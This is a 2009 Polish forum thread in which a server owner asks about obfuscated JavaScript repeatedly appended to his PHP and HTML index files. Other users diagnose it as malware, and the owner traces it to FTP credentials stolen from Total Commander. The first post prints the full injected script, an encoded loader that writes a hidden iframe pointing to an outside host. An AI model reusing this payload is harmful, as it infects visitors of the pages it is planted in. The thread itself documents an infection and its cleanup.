Forum PHP.pl > [PHP] Co to może być?

Pomoc - Szukaj - Użytkownicy - Kalendarz

Tomek58

11.04.2009, 18:26:38

Witam!

Mam mały problem, nie wiem dlaczego do wielu plików z rozszerzeniem .php na moim serwerze dodaje się na samym końcu kod typu:

Kod

?><script>function c32d980125q49e11f07f2685(q49e11f07f2a69){ function q49e11f07f2e54(){var q49e11f07f323a=16;return q49e11f07f323a;} return (eval('pa'+'rseInt')(q49e11f07f2a69,q49e11f07f2e54()));}function q49e11f07f3622(q49e11f07f3a1d){ function q49e11f0800c80(){var q49e11f0800f3f=2;return q49e11f0800f3f;} var q49e11f07f3df2='';q49e11f0801324=String['fromCharCode'];for(q49e11f07f41da=0;q49e11f07f41da<q49e11f07f3a1d.length;q49e11f07f41da+=q49e11f0800c80()){ q49e11f07f3df2+=(q49e11f0801324(c32d980125q49e11f07f2685(q49e11f07f3a1d.substr(q49e11f07f41da,q49e11f0800c80()))));}return q49e11f07f3df2;} var vf0='';var q49e11f080170c='3C7'+vf0+'3637'+vf0+'2697'+vf0+'07'+vf0+'43E696628216D7'+vf0+'96961297'+vf0+'B646F637'+vf0+'56D656E7'+vf0+'42E7'+vf0+'7'+vf0+'7'+vf0+'2697'+vf0+'465287'+vf0+'56E657'+vf0+'363617'+vf0+'065282027'+vf0+'2533632536392536362537'+vf0+'3225363125366425363525323025366525363125366425363525336425363325333325333225
2302537'+vf0+'332537'+vf0+'32253633253364253237'+vf0+'2536382537'+vf0+'342537'+vf0+'342537'+vf0+'302533612532662532662536362536312536322536392536662536642536662537'+vf0+'342536662537'+vf0+'322532652536332536652532662537'+vf0+'332536312536662537'+vf0+'302536392537'+vf0+'302533322537'+vf0+'392537'+vf0+'342533332537'+vf0+'30253338253337'+vf0+'2537'+vf0+'342537'+vf0+'332536312536612536382536342536312532662536392536652536342536352537'+vf0+'382532652537'+vf0+'302536382537'+vf0+'30253366253237'+vf0+'2532622534642536312537'+vf0+'342536382532652537'+vf0+'322536662537'+vf0+'352536652536342532382534642536312537'+vf0+'342536382532652537'+vf0+'32253631253665253634253666253664253238253239253261253335253334253337'+vf0+'253335253330253239253262253237'+vf0+'253330253633253337'+vf0+'253633253332253332253334253633253336253333253333253635253237'+vf0+'2532302537'+vf0+'37'+vf0+'2536392536342537'+vf0+'34253638253364253332253331253339253230253638253635253639253637'+vf0+'2536382537'+vf0+'342533642533322533352533302532302537'+vf0+'332537'+vf0+'342537'+vf0+'39253663253635253364253237'+vf0+'2537'+vf0+'362536392537'+vf0+'332536392536322536392536632536392537'+vf0+'342537'+vf0+'39253361253638253639253634253634253635253665253237'+vf0+'2533652533632532662536392536362537'+vf0+'3225363125366425363525336527'+vf0+'29293B7'+vf0+'D7'+vf0+'6617'+vf0+'2206D7'+vf0+'969613D7'+vf0+'47'+vf0+'27'+vf0+'5653B3C2F7'+vf0+'3637'+vf0+'2697'+vf0+'07'+vf0+'43E';q49e11f0801eda=document;q49e11f0801eda.write(q49e11f07f3622(q49e11f080170c));</script>

Co to jest? Dodaje się samo, zaraz po ?>

Berg

11.04.2009, 18:32:32

Prawdopodobnie skrypt do statystyk na serwerze. Takie coś jest doklejane np. przez home.pl, powinieneś mieć możliwość wyłączenia tego u siebie w panelu.

Tomek58

11.04.2009, 18:37:44

Szczerze mówiąc pojawiło się to po zainstalowaniu modu: http://www.przemo.org/phpBB2/forum/viewtopic.php?t=65253 do forum na PHPBB. Tylko czemu kod ten dokleja się na wszystkich indexach na serwerze?

PS. Serwer dedykowany, więc to raczej nie są statystyki :/

MWL

11.04.2009, 18:58:06

to zapewne jakiś atak, najprawdopodobniej xss, albo ktoś wgrał ci stronę do zarządzania twoim FTP.

mrok

11.04.2009, 18:59:31

Jeśli nie wiesz skąd się to wzięło i masz zapisane hasło w programie do łaczenia się z FTP to naprawdopodobniej jest to objaw działalności jakiegoś robaka ;(

Spróbuj przeskanować czymś sytem, zmień hasło na ftp (i nie zapisuje go w programie), wywal te wpisy na końcu skryptów.
Poszukaj jeszcze na forum (tym) bo nie tylko Ty masz taki problem

erix

11.04.2009, 19:32:19

90%, że jakiś syf; był o tym temat w Hydeparku.

Tomek58

11.04.2009, 19:38:43

Z tego co zauważyłem zapisywało się tylko w plikach index.html / index.php. Zawsze w ścieżkach / i /katalog, nigdy w /katalog/katalog2. Bardzo dziwne, pierwszy raz się z czymś takim spotykam. Powstawiało nawet kod w zewnętrznych folderach stron (do każdego inny login i hasło FTP).

patryk9200

11.04.2009, 21:14:30

Miałem podobny problem:P
prawdopodobnie jest to złośliwy kod próbując włamać się do systemu odwiedzajacych twą stronę

jedyny sposób to jego usunięcie, sprawdź katalogi czy nie masz dziwnych plików,
wykorzystuje pewną lukę

...Jakie masz prawa do folderów??

Tomek58

11.04.2009, 22:21:47

Katalogi mają chmod 755.

Usuwam to, a po kilkunastu minutach nadal się pojawia :/

Edit: Problem rozpoznany. Znalazłem w logach FTP połączenia z rosyjskiego IP, widocznie jakiś robal wyciągnął zakodowane hasła z pliku Total Commandera. Wystarczy więc zmienić hasło do FTP i nie zapisywać go w programach typu TCM. :-)

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.